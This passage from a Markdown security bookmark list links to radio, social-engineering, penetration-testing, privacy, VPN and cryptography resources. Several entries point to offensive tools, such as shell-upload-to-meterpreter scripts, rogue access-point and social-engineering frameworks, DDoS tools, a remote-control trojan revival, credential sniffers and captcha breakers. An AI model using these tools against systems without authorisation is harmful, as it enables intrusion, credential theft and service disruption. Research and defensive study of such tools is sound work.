- [SpectMorph](https://www.spectmorph.org/): is a free software project which allows to analyze samples of musical instruments, and to combine them (morphing).
- [The LibreCellular project](https://librecellular.org/) aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware.
- [RFSec-ToolKit](https://github.com/cn0xroot/RFSec-ToolKit) is a collection of Radio Frequency Communication Protocol Hacktools.

### Satellite

- [How Do I Crack Satellite and Cable Pay TV? (33c3)](https://www.youtube.com/watch?v=lhbSD1Jba0Q)
- [Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream.](https://github.com/akacastor/noob)
- [Process QPSK-demodulated data into transport stream (SCTE 55-1)](https://github.com/akacastor/oobin)

## Social Engineering

- [Cartero](https://github.com/Section9Labs/Cartero/): Social Engineering Framework
- [The Basics of Social Engineering](https://www.youtube.com/watch?v=tCRT3QFzwm8&feature=youtu.be) by Chris Pritchard on DEF CON 27. Books suggested:
- [Never Split Difference](https://www.thriftbooks.com/w/killer-deals_chris-voss_tahl-raz/10231806/) - Chris Voss
- [The Carisma Myth](https://www.askolivia.com/store-1) - Olivia Fox Cabane
- [Hacking the Human](https://www.goodreads.com/author/show/2898350.Ian_Mann) - Ian Mann
- The Art Of Social Engineering - [Chris Hadnagy](https://en.wikipedia.org/wiki/Christopher_J._Hadnagy)
- What Everybody is Saying - [Joe Navarro](https://www.jnforensics.com/books)
- [The Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit): repository from TrustedSec - All new versions of SET will be deployed here.

## Tools

- [Network Security Monitoring on Raspberry Pi type devices](https://github.com/TravisFSmith/SweetSecurity)
- [A secure, shared workspace for secrets](https://github.com/manifoldco/torus-cli)
- [bettercap](https://github.com/evilsocket/bettercap-ng), the Swiss army knife for network attacks and monitoring.
- [Quijote](https://github.com/evilsocket/quijote) is an highly configurable HTTP middleware for API security.
- [Tool Analysis Result Sheet](https://github.com/JPCERTCC/ToolAnalysisResultSheet) and [guide](https://jpcertcc.github.io/ToolAnalysisResultSheet/), via [Detecting Lateral Movement through Tracking Event Logs](http://www.jpcert.or.jp/english/pub/sr/ir_research.html) by jpcertcc
- [EKOLABS](https://github.com/ekoparty/ekolabs) tools repo
- [Vapor PwnedPasswords Provider](https://github.com/joscdk/pwnedpasswords-provider): Package for testing a password against Pwned Passwords V2 API in Vapor
- [Is my password pwned?](https://github.com/kevlar1818/is_my_password_pwned), [bash script](https://www.james-ridgway.co.uk/blog/pwnedpasswords-sh-a-bash-script-for-searching-troy-hunt-s-pwnedpasswords)
- [XPoCe](http://newosxbook.com/tools/XPoCe2.html) - XPC Snooping utilties for MacOS and iOS (version 2.0)
- [Enterprise Password Quality Checking](https://github.com/CboeSecurity/password_pwncheck) using any hash data sources (HaveIBeenPwned lists, et al)
- [DockerAttack](https://github.com/ZephrFish/DockerAttack): Various Tools and Docker Images
- [PyREBox](https://github.com/Cisco-Talos/pyrebox) is a Python scriptable Reverse Engineering sandbox
- [find3](https://github.com/schollz/find3): High-precision indoor positioning framework, version 3
- [structured-text-tools](https://github.com/dbohdan/structured-text-tools): A list of command line tools for manipulating structured text data
- [telnetlogger](https://github.com/robertdavidgraham/telnetlogger): Simulates enough of a Telnet connection in order to log failed login attempts.
- [vault](https://github.com/hashicorp/vault): A tool for secrets management, encryption as a service, and privileged access management
- [WeakNet LINUX 8](http://www.weaknetlabs.com/p/weaknet-linux.html): This is an information-security themed distribution that has been in development since 2010.
- [HiTB](https://www.vulnhub.com/entry/hackthebox-nineveh-v03,222/): It was a part of HackTheBox platform.
- [arphid](https://github.com/arphid/arphid): DYI 125KHz RFID read/write/emulate guide
- [Pybelt](https://github.com/Ekultek/Pybelt): The hackers tool belt
- [mhax](https://github.com/smealum/mhax)
- [U2F Support Firefox Extension](https://github.com/prefiks/u2f4moz)
- [git-bug](https://github.com/MichaelMure/git-bug): Distributed bug tracker embedded in Git
- [mkcert](https://github.com/FiloSottile/mkcert): A simple zero-config tool to make locally trusted development certificates with any names you'd like
- [trackerjacker](https://github.com/calebmadrigal/trackerjacker): Like nmap for mapping wifi networks you're not connected to, plus device tracking
- [Polymorph](https://github.com/shramos/polymorph) is a real-time network packet manipulation framework with support for almost all existing protocols
- [query_huawei_wifi_router](https://github.com/zikusooka/query_huawei_wifi_router/): A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
- [kravatte](https://github.com/inmcm/kravatte/): Implementation of Kravatte Encryption Suite
- [noisy](https://github.com/1tayH/noisy): Simple random DNS, HTTP/S internet traffic noise generator
- [PatternAnalyzer](https://github.com/S1ckB0y1337/PatternAnalyzer): The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
- [Google Chromium](https://github.com/Eloston/ungoogled-chromium), sans integration with Google
- [Gammux](https://github.com/carl-mastrangelo/gammux): A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
- [openvotenetwork](https://git.openprivacy.ca/sarah/openvotenetwork): Implementation of anonymous [Open Vote Network](https://en.wikipedia.org/wiki/Open_vote_network) in go
- [put2win](https://github.com/sysdevploit/put2win): Script to automatize shell upload by PUT HTTP method to get meterpreter
- [Tools by Morphus Labs](https://morphuslabs.com/tools/home)
- [Stratosphere IPS](https://www.stratosphereips.org/)
- [Convert nmap Scans into Beautiful HTML Pages](https://members.rootsh3ll.com/t/convert-nmap-scans-into-beautiful-html-pages/255)
- [NMapGUI](https://github.com/danicuestasuarez/NMapGUI): Advanced Graphical User Interface for NMap
- [GeoInt](https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji#gsc.tab=0)
- [python-nubia](https://github.com/facebookincubator/python-nubia/): A command-line and interactive shell framework.
- [nipe](https://github.com/GouveaHeitor/nipe): is a script to make Tor Network your default gateway.
- [fuxploider](https://github.com/almandin/fuxploider): File upload vulnerability scanner and exploitation tool.
- [solo](https://github.com/SoloKeysSec/solo): FIDO2 USB+NFC token optimized for security, extensibility, and style
- [Joint Report On Publicly Available Hacking Tools](https://cyber.gc.ca/en/guidance/joint-report-publicly-available-hacking-tools): by Canadian Centre for Cyber Security.
- [APTSimulator](https://github.com/NextronSystems/APTSimulator): A toolset to make a system look as if it was the victim of an APT attack
- [debugger-netwalker](https://github.com/opsxcq/debugger-netwalker): NetWalker Debugger
- [USB armory](https://github.com/inversepath/usbarmory): [open source flash-drive-sized computer](http://inversepath.com/usbarmory)
- [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator): A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
- [Big List of Naughty Strings](https://github.com/minimaxir/big-list-of-naughty-strings)
- [Netflix Cloud Security SIRT releases Diffy](https://medium.com/netflix-techblog/netflix-sirt-releases-diffy-a-differencing-engine-for-digital-forensics-in-the-cloud-37b71abd2698): A Differencing Engine for Digital Forensics in the Cloud - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- [Command-Line Snippets](https://snippets.shodan.io/): A place to share useful, one-line commands that make your life easier.
- [IP-to-ASN - Team Cymru](https://www.team-cymru.com/IP-ASN-mapping.html)
- [4nonimizer](https://github.com/Hackplayers/4nonimizer): A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN).
- [free Entropy Service](https://rng.13-37.org/).
- [Correct Horse Battery Staple](http://correcthorsebatterystaple.net/): Secure password generator to help keep you safer online. [code](https://bitbucket.org/jvdl/correcthorsebatterystaple)
- [CorrectHorse](https://github.com/artgromov/CorrectHorse): random secure password generator.
- [XKCD-password-generator](https://github.com/redacted/XKCD-password-generator): Generate secure multiword passwords/passphrases, inspired by XKCD
- [Using a Hardened Container Image for Secure Applications in the Cloud](https://www.cisecurity.org/blog/using-hardened-container-image-secure-applications-cloud/)
- [freedomfighting](https://github.com/JusticeRage/freedomfighting/): A collection of scripts which may come in handy during your freedom fighting activities.
- [Machine Learning and Security](https://github.com/13o-bbr-bbq/machine_learning_security): Source code about machine learning and security.
- [octofairy](https://github.com/evilsocket/octofairy): A machine learning based GitHub bot for Issues.
- [kbd-audio](https://github.com/ggerganov/kbd-audio): Tools for capturing and analysing keyboard input paired with microphone capture
- [certstreamcatcher](https://github.com/6IX7ine/certstreamcatcher): This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
- [Wifiphisher](https://github.com/wifiphisher/wifiphisher): is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
- [chezmoi](https://github.com/twpayne/chezmoi): Manage your dotfiles securely across multiple machines.
- [hexyl](https://github.com/sharkdp/hexyl): A command-line hex viewer.
- [Giggity](https://github.com/needmorecowbell/giggity): Wraps github api for openly available information about an organization, user, or repo.
- [howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound): Count the number of people around you by monitoring wifi signals .
- [LASCAR](https://github.com/Ledger-Donjon/lascar): Ledger's Advanced Side-Channel Analysis Repository.
- [Hostintel](https://www.kitploit.com/2019/03/hostintel-modular-python-application-to.html): A Modular Python Application To Collect Intelligence For Malicious Hosts - [github](https://github.com/keithjjones/hostintel)
- [DarkNet_ChineseTrading](https://github.com/aoii103/DarkNet_ChineseTrading)
- [mXtract](https://github.com/rek7/mXtract): Memory Extractor & Analyzer.
- [commando-vm](https://github.com/fireeye/commando-vm): a fully customized, Windows-based security distribution for penetration testing and red teaming.
- [commando packages](https://github.com/mandiant/commando-vm/blob/master/packages.csv)
- [Introducing Inkdrop 4](https://blog.inkdrop.info/introducing-inkdrop-4-9d0c63de16d2)
- [AntiCheat-Testing-Framework](https://github.com/niemand-sec/AntiCheat-Testing-Framework): Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
- IronPython, darkly: [how we uncovered an attack on government entities in Europe](http://blog.ptsecurity.com/2019/07/ironpython-darkly-how-we-uncovered.html)
- [inlets](https://github.com/alexellis/inlets): Expose your local endpoints to the Internet
- Papers released by the Intelstorm Team[papers](https://github.com/intelstormteam/Papers)
- [Pwnagotchi](https://github.com/evilsocket/pwnagotchi): (⌐■_■) - Deep Reinforcement Learning vs WiFI
- [spyse.py](https://github.com/zeropwn/spyse.py): Python API wrapper and command-line client for the tools hosted on spyse.com.
- [Cloning a MAC address to bypass a captive portal](https://fedoramagazine.org/cloning-a-mac-address-to-bypass-a-captive-portal/)
- [Open Steno Project](http://www.openstenoproject.org/) was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry.
- [Machine Learning on Encrypted Data Without Decrypting It](https://juliacomputing.com/blog/2019/11/22/encrypted-machine-learning.html)
- [0bin](https://github.com/sametmax/0bin): Client side encrypted pastebin.
- [Raspberry pi as poor man’s hardware hacking tool](https://payatu.com/blog/Arun-Magesh/using-rasberrypi-as-poor-mans-hardware-hacking-tool)
- [usbkill](https://github.com/hephaest0s/usbkill): is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.
- [gs-transfer](https://github.com/hackerschoice/gs-transfer): Secure File Transfer via Global Socket Bounce Network.
- [CORE](https://github.com/coreemu/core): The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines.
- [VoightKampff](https://bitbucket.org/Pirates-of-Silicon-Hills/voightkampff/src/master/): Beating Google ReCaptcha and the funCaptcha using AWS Rekognition.
- [John the Ripper in the cloud](https://www.openwall.com/john/cloud/): John the Ripper jumbo supports hundreds of hash and cipher types.
- [SpamCop](https://www.spamcop.net/) is the premier service for reporting spam.
- [vector-edk](https://github.com/hackedteam/vector-edk): EFI Development Kit.
- [H1R0GH057](https://github.com/H1R0GH057/Anonymous): tools (DDoS, lulz, etc..)
- [gatekeeper](https://github.com/AltraMayor/gatekeeper): First open-source DDoS protection system
- [uriDeep](https://github.com/mindcrypt/uriDeep): Unicode encoding attacks with machine learning
- [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/): [An inventory of tools and resources about CyberSecurity.](https://github.com/noraj/rawsec-cybersecurity-inventory)
- [gaijin tools](https://www.gaijin.at/en/software/)
- [Lord Of The Strings (LOTS)](https://github.com/eset-la/Lord-Of-The-Strings): String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
- [Unit 42 Public Tools Repo](https://github.com/pan-unit42/public_tools): Listing of tools released by Palo Alto Networks Threat Intelligence team.
- [glsnip](https://github.com/bradwood/glsnip): copy and paste across machines
- [CERTrating](https://certrating.it/) is the first tool to assess the Maturity Level of CERTs and their services. News: [CERTrating a new Tool to evaluate CERT/CSIRT maturity level](https://securityaffairs.co/wordpress/93705/hacking/certrating-tool.html)
- [Cybersecurity Maturity Model Certification (CMMC)](https://www.acq.osd.mil/cmmc/)
- [What is the Cybersecurity Maturity Model Certification (CMMC)](https://logit.io/blog/post/what-is-cmmc)
- [Who needs to have Cybersecurity Maturity Model Certification (CMMC)](https://logit.io/blog/post/who-needs-cmmc-certification)
- [Security Tools](https://www.rediris.es/cert/tools/): Most of the links listed here goes to the original sites.
- [Find Virtual Hosts for Any IP Address](https://pentest-tools.com/information-gathering/find-virtual-hosts)
- [ngrok](https://github.com/inconshreveable/ngrok): Introspected tunnels to localhost
- [cppngrok](https://github.com/70corre20matar/cppngrok/): a cpp wrapper for ngrok (WIP)
- [Pybull](https://github.com/sumana2001/Pybull): Contains some cool python projects. It is 100% python coded. Have fun see_no_evil
- [dfss](https://github.com/area31/dfss): Daemon for sense of security. Shutdown or reboot your computer, like a "[USBKILL](https://area31.net.br/wiki/DFSS_USBkiller)".
- [Gamifying machine learning for stronger security and AI models](https://www.microsoft.com/security/blog/2021/04/08/gamifying-machine-learning-for-stronger-security-and-ai-models/): [CyberBattleSim](https://github.com/microsoft/CyberBattleSim): An experimentation and research platform to investigate the interaction of automated agents in an abstract simulated network environments.
- [BashScan](https://github.com/astryzia/BashScan): is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap.
- [python-libnessus](https://github.com/savon-noir/python-libnessus): Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful.
- [NFIQ2](https://github.com/usnistgov/NFIQ2): Biometric fingerprint image quality assessment tool.
- [Beta](https://github.com/DidierStevens/Beta): Beta versions of Didier Stevens's software
- [MaxMind ASN Importer](https://github.com/CiscoSE/MaxmindAsnImporter): This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows.
- [SubSeven is Back](https://www.sub7crew.org/): The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required.
- [Detect It Easy](https://github.com/horsicq/Detect-It-Easy): Program for determining types of files for Windows, Linux and MacOS. [DIE Engine](https://github.com/horsicq/DIE-engine)
- [Ronin](https://ronin-rb.dev/) is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, install 3rd party repositories of exploits and/or payloads, run exploits, write new exploits, managing local databases, fuzzing data, and much more.

### Note-taking

- [Awesome note-taking apps for hackers !](https://github.com/nil0x42/awesome-hacker-note-taking)
- [SwiftnessX](https://github.com/ehrishirajsharma/SwiftnessX): A cross-platform note-taking & target-tracking app for penetration testers.
- [cherrytree](https://www.giuspen.com/cherrytree/): A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. [repo](https://github.com/giuspen/cherrytree)
- [cherrytree](https://www.giuspen.com/cherrytree/): A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. [repo](https://github.com/giuspen/cherrytree)
- [SwiftnessX](https://github.com/ehrishirajsharma/SwiftnessX): A cross-platform note-taking & target-tracking app for penetration testers.
- [trilium]): Build your personal knowledge base with Trilium Notes.
- [obsidian](https://obsidian.md/download): is a powerful knowledge base that works on top of a local folder of plain text Markdown files.
- [CudaText](https://www.fosshub.com/CudaText.html), [repo](https://github.com/Alexey-T/CudaText)
- [marktext](https://github.com/marktext/marktext/): A simple and elegant markdown editor, available for Linux, macOS and Windows.
- [helix](https://github.com/helix-editor/helix): A post-modern modal text editor.
- [Compare AsciiDoc and Markdown](https://docs.asciidoctor.org/asciidoc/latest/asciidoc-vs-markdown/)

### Kali

- [hurl](https://github.com/fnord0/hURL): hexadecimal & URL encoder + decoder. [Package Description](https://tools.kali.org/web-applications/hurl): hURL is a small utility that can encode and decode between multiple formats.
- [Kali Tools](https://www.kali.org//tools/)

### IP Reputation

- [IP Reputation Check](https://www.ipqualityscore.com/ip-reputation-check)
- [IP & Domain Reputation Center](https://talosintelligence.com/reputation_center/)

### Shell tools

- [Python-Scripts](https://github.com/bing0o/Python-Scripts): some scripts for penetration testing.
- [SubEnum](https://github.com/bing0o/SubEnum): bash script for Subdomain Enumeration
- [password-store](https://git.zx2c4.com/password-store/): Simple password manager using gpg and ordinary unix directories.

### Search Engines

- [DarkSearch](https://darksearch.io/): [The 1st real Dark Web search engine (Darksearch vs Ahmia)](https://medium.com/@darksearch/darksearch-the-1st-real-search-engine-dark-web-darksearch-vs-ahmia-84852fd4c51b)
- [Search engines for Hackers](https://twitter.com/trimstray/status/1194515305306955776):
- [censys.io](https://censys.io)
- [shodan.io](https://shodan.io)
- [TriOp](https://untrustednetwork.net/en/triop/): Tool for quickly gathering statistical information from Shodan.io [repo](https://github.com/NettleSec/TriOp)
- [viz.greynoise.io](https://viz.greynoise.io)
- [zoomeye.org](https://zoomeye.org)
- [wigle.net](https://wigle.net)
- [publicwww.com](https://publicwww.com)
- [hunter.io](https://hunter.io)
- [haveibeenpwned.com](https://haveibeenpwned.com)
- [haveibeenEMOTET](https://www.haveibeenemotet.com/)
- [thispersondoesnotexist.com](https://thispersondoesnotexist.com)
- [osintframework.com](https://osintframework.com)
- [NAPALM FTP Indexer](https://www.searchftps.net/) lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members.
- [Insecam](https://www.insecam.org/): Network live IP video cameras directory.

### VPN

- [jigsaw project](https://jigsaw.google.com/vision/) by Alphabet/Google. [Outline](https://github.com/Jigsaw-Code/outline-server): VPN Server.
- [SSHuttle](https://github.com/sshuttle/sshuttle): Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
- [WireGuard](https://www.wireguard.com/): is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- [Crockford’s base 32 encoding](https://www.johndcook.com/blog/2018/12/28/base-32-and-base-64-encoding/): Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
- [Sputnik](https://medium.com/bugbountywriteup/sputnik-an-open-source-intelligence-browser-extension-da2f2c22c8ec) -An Open Source Intelligence Browser Extension
- [PCredz](https://github.com/lgandx/PCredz): This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
- [uncaptcha2](https://github.com/ecthros/uncaptcha2): defeating the latest version of ReCaptcha with 91% accuracy
- [Nefarious LinkedIn](https://github.com/dandrews/nefarious-linkedin): A look at how LinkedIn spies on its users.
- [ProtonVPN-CLI](https://github.com/ProtonVPN/linux-cli): Linux command-line client for ProtonVPN. Written in Python.
- [Nebula](https://github.com/slackhq/nebula): A scalable overlay networking tool with a focus on performance, simplicity and security. [Introducing Nebula](https://slack.engineering/introducing-nebula-the-open-source-global-overlay-network-from-slack/)
- [AirVPN](https://airvpn.org/) A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship.
- [Build your own private WireGuard VPN with PiVPN](https://www.jeffgeerling.com/blog/2023/build-your-own-private-wireguard-vpn-pivpn).

### Secure Sharing

- [CryFS](https://www.cryfs.org/comparison/): Keep your data safe in the cloud. [code](https://github.com/cryfs/cryfs)
- [Cryptomator](https://cryptomator.org/): Multi-platform transparent client-side encryption of your files in the cloud. [code](https://github.com/cryptomator/cryptomator)
- [VeraCrypt](https://www.veracrypt.fr/en/Home.html): is a free open source disk encryption software for Windows, Mac OSX and Linux.
- [CipherShed](https://www.ciphershed.org/): is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). [code](https://github.com/CipherShed/CipherShed)
- [Boxcryptor](https://www.boxcryptor.com/en/): Security for your Cloud.
- [Nextcloud E2E](https://github.com/nextcloud/end_to_end_encryption_rfc): End-to-end encryption RFC. Some old news [about it](https://www.bitblokes.de/end-to-end-verschluesselung-e2e-nextcloud-14/)
- [DiskCryptor](https://www.diskcryptor.org/) is an open encryption solution that offers encryption of all disk partitions, including the system partition. [code](https://github.com/DavidXanatos/DiskCryptor)
- [ProjectSend](https://github.com/projectsend/projectsend) is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
- Mozilla [send](https://github.com/mozilla/send): Simple, private file sharing from the makers of Firefox (archived). Revival: [send](https://github.com/timvisee/send)

## Privacy

- Apple: [Device and Data Access when Personal Safety is At Risk](https://manuals.info.apple.com/MANUALS/1000/MA1976/en_US/device-and-data-access-when-personal-safety-is-at-risk.pdf)
- [Everything Old is New Part 2: Why Online Anonymity Matters](https://jilliancyork.com/2021/01/14/everything-old-is-new-part-2-why-online-anonymity-matters/)
- [Data Security on Mobile Devices](https://securephones.io/main.html): Current State of the Art, Open Problems, and Proposed Solutions.
- [Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.](https://twitter.com/MayhemDayOne/status/1380148530321489922)
- [TorBox Wireless Manager](https://www.torbox.ch/?p=2027)
- [Anyone can use this powerful facial-recognition tool — and that's a problem](https://edition.cnn.com/2021/05/04/tech/pimeyes-facial-recognition/index.html)
- [The Instagram ads Facebook won't show you](https://signal.org/blog/the-instagram-ads-you-will-never-see/)
- [Yggdrasil](https://github.com/yggdrasil-network/yggdrasil-go): An experiment in scalable routing as an encrypted IPv6 overlay network.
- [Receiving sensitive information about any Dodo pizzeria](https://github.com/fuad00/dodopizza-abuse)
- [4TB of stolen identities are being circulated online following a breach on Oriflame](https://twitter.com/vxunderground/status/1423553385479933952)
- [Using “Master Faces” to Bypass Face-Recognition Authenticating Systems](https://www.schneier.com/blog/archives/2021/08/using-master-faces-to-bypass-face-recognition-authenticating-systems.html), [Generating Master Faces for Dictionary Attacks witha Network-Assisted Latent Space Evolution](https://arxiv.org/pdf/2108.01077.pdf), two [other](https://gizmodo.com/master-face-researchers-say-theyve-found-a-wildly-succ-1847420710) [news](https://www.unite.ai/master-faces-that-can-bypass-over-40-of-facial-id-authentication-systems/)
- [apollo](https://github.com/amirgamil/apollo): A Unix-style personal search engine and web crawler for your digital footprint.
- [Forensic Methodology Report: How to catch NSO Group’s Pegasus](https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/)
- [Who is being monitored?](https://tutanota.com/blog/posts/wer-wird-belauscht/): Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored?
- [How to choose a browser for everyday use?](https://digdeeper.neocities.org/ghost/browsers.html), [E-mail providers - which one to choose?](https://digdeeper.neocities.org/ghost/email.html) and [Search Engines - which one to choose?](https://digdeeper.neocities.org/ghost/search.html)
- [TrackerControl](https://github.com/OxfordHCC/tracker-control-android): monitor and control trackers and ads.
- [Disinformation guru “Hacker X” names his employer: NaturalNews.com](https://arstechnica.com/tech-policy/2021/10/disinformation-guru-hacker-x-names-his-employer-naturalnews-com/)
- [Hey Siri, Find My Ex](https://objectivebythesea.com/v4/talks/OBTS_v4_eGalperin.pdf): Tech-Enabled Abuse in the Apple Ecosystem.
- [Keyhole Imaging](https://www.computationalimaging.org/publications/keyhole-imaging/)
- [Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared](https://www.nytimes.com/2017/07/25/technology/roomba-irobot-data-privacy.html)
- [Global Presence of Authoritarian Tech](https://twitter.com/hackermaderas/status/1470142520403365889)
- [Zooming in on Zero-click Exploits](https://googleprojectzero.blogspot.com/2022/01/zooming-in-on-zero-click-exploits.html)

## General

- [Explain Shell](https://explainshell.com)
- [Examples of regular expressions](https://support.google.com/a/answer/1371417?hl=en)
- [A tcpdump Tutorial and Primer with Examples](https://danielmiessler.com/study/tcpdump/)
- [Capture WiFi / WLAN / 802.11 Probe Request with tcpdump](http://robinhenniges.com/en/capture-probe-request-tcpdump-wlan-wifi)
- [A curated list of awesome Threat Intelligence resources](https://github.com/hslatman/awesome-threat-intelligence)
- [Looking for value in EV Certificates](https://adamcaudill.com/2017/04/09/looking-value-ev-certificates/)
- [How to find hidden cameras](http://www.tentacle.franken.de/papers/hiddencams.pdf)
- [the Simple Encrypted Arithmetic Library (SEAL)](https://github.com/Lab41/PySEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
- [Cupcake](https://github.com/facebookresearch/Cupcake): A Rust library for lattice-based additive homomorphic encryption.
- [Our latest updates on Fully Homomorphic Encryption](https://developers.googleblog.com/2021/06/our-latest-updates-on-fully-homomorphic-encryption.html) [repo](https://github.com/google/fully-homomorphic-encryption)
- [A port of ChibiOS to the Orchard radio platform](https://github.com/sutajiokousagi/chibios-orchard)
- [Decent Security](https://decentsecurity.com/#/malware-web-and-phishing-investigation/): Everyone can be secure.
- [Introducing Certificate Transparency and Nimbus](https://blog.cloudflare.com/introducing-certificate-transparency-and-nimbus/)
- [trillian](https://github.com/google/trillian): Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
- [CFSSL's CA trust store repository](https://github.com/cloudflare/cfssl_trust)
- [A Few Thoughts on Cryptographic Engineering](https://blog.cryptographyengineering.com/2018/04/07/hash-based-signatures-an-illustrated-primer/)
- [Mailfence](https://mailfence.com/)
- [Threat Hunting Workshop - Methodologies for Threat Analysis](https://www.youtube.com/playlist?list=PLgLzPE5LJevb_PcjMYMF2ypjnVcKf8rjY)
- [Xoodoo](https://github.com/XoodooTeam/Xoodoo)
- [CoPilot](http://openinternet.github.io/copilot/) is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
- [AgentMaps](https://github.com/noncomputable/AgentMaps): Make social simulations on interactive maps with Javascript!
- [flowsscripts](https://github.com/csirtunicamp/flowsscripts/): Miner pools ips.
- [SwiftFilter](https://github.com/SwiftOnSecurity/SwiftFilter): Exchange Transport rules to detect and enable response to phishing
- [The Illustrated TLS Connection](https://tls.ulfheim.net/): Every Byte Explained and [The New Illustrated TLS Connection](https://tls13.ulfheim.net/)
- [Practical Cryptography](http://practicalcryptography.com/)
- [Thieves and Geeks: Russian and Chinese Hacking Communities](https://www.recordedfuture.com/russian-chinese-hacking-communities/)
- [ephemera-miscellany](https://github.com/1337list/ephemera-miscellany): Ephemera and other documentation associated with the 1337list project.
- [CleverHans](https://github.com/tensorflow/cleverhans): An adversarial example library for constructing attacks, building defenses, and benchmarking both
- [HTTP/3 Explained](https://daniel.haxx.se/blog/2018/11/26/http3-explained/) - [github](https://github.com/bagder/http3-explained)/[http2 explained](https://daniel.haxx.se/http2/) - [github](https://github.com/bagder/http2-explained)
- [security](https://github.com/tc39/security): Discussion area for security aspects of ECMAScript
- [Template for Data Protection Impact Assessment (DPIA)](https://iapp.org/resources/article/template-for-data-protection-impact-assessment-dpia/)
- [hash collisions](https://github.com/corkami/pocs/blob/master/collisions/README.md) exploitation and other [pocs](https://github.com/corkami/pocs), a [script to collide PDFs](https://github.com/corkami/pocs/commit/3832f62d8aad64d541c5d1fee755f30c44535374)
- [Shodan - A tool for Security and Market Research](http://aliarsalankazmi.github.io/blog_DA/posts/r/2017/11/21/shodan-r-market-security-research.html)
- [Engineering Security](https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf): general book about a range of topics in security.
- (ru) [Плакаты по информационной безопасности Российской армии](https://topwar.ru/129563-plakaty-po-informacionnoy-bezopasnosti-rossiyskoy-armii.html): Russian counter information posters.
- [Kerberos (I)](https://www.tarlogic.com/en/blog/how-kerberos-works/): How does Kerberos work? – Theory
- [Vulncode-DB project](https://github.com/google/vulncode-db): The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
- [One-End Encryption (OEE)](https://github.com/veorq/oee): Stronger than End-to-End Encryption
- [Automatic SSL with Now and Let's Encrypt](https://zeit.co/blog/automatic-ssl-with-now-lets-encrypt)
- [Hacking Digital Calipers](https://www.notion.so/Hacking-Digital-Calipers-3ee7726f11ca431694dc70a1977516e4)
- [Binary Hardening in IoT products](https://cyber-itl.org/2019/08/26/iot-data-writeup.html): Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
- [ZigDiggity](https://github.com/BishopFox/zigdiggity): A ZigBee hacking toolkit by Bishop Fox.
- [Bolstering Security with Cyber Intelligence](https://insights.sei.cmu.edu/sei_blog/2019/10/bolstering-security-with-cyber-intelligence.html)
- [Resources-for-Beginner-Bug-Bounty-Hunters](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters): A list of resources for those interested in getting started in bug bounties
- [THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS](https://info.townsendsecurity.com/definitive-guide-to-encryption-key-management-fundamentals)
- [Explanatory Reportto the Additional Protocol to the Convention on Cybercrime](https://rm.coe.int/ida/DisplayDCTMContent?documentId=09000016800d37ae)
